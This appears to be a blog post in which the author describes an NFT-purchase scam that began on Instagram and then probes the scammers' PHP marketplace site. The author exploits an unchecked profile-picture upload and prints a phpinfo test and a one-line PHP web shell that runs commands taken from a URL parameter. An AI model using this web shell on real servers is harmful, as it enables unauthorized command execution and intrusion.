In the age of digital connectivity and social media, our virtual lives have become increasingly intertwined with the online world. Instagram, one of the world's most popular social networking platforms, offers us a space to share moments, connect with friends, and even discover new opportunities. However, amidst the genuine connections and inspiring content, a darker side lurks: the realm of scams.

It all started 2 days ago, with a message like this:

Hi. I'll love to purchase some of your work, if they are available for purchase. I am interested in purchasing 4 works digitally as NFT You need a platform to change them to NFT which is their digital form. Then I'll buy them for 2.70ETH which is $4,900 each. You have a wallet, right?

I then got forwarded to Telegram, which I kindly declined, but I made them email me. That's the marketplace where you can upload your art so that I can purchase it, but you will need to set up an account with them before you can do that.

uniquemost.online

I found myself on a PHP site. I registered an account (with fake credentials), and started exploring the website. Furthermore, I was trying to find something to do some kind of XSS or SQL injection, but then, I found something a little bit more fun.

A file upload box to upload a profile picture. I tried putting something that was not an image and the site accepted it. It gave me a path under the same directory I was under. It tingled a part of my brain. I suspected a web-shell-type of vulnerability.

I quickly made a PHP script to test that assumption:

<?php
phpinfo();
?>

Opening later the "profile picture" resulted in showing phpinfo. Nice!

Payload

I started writing a little payload to try and get a shell on this site.

<?=`$_GET[0]`?>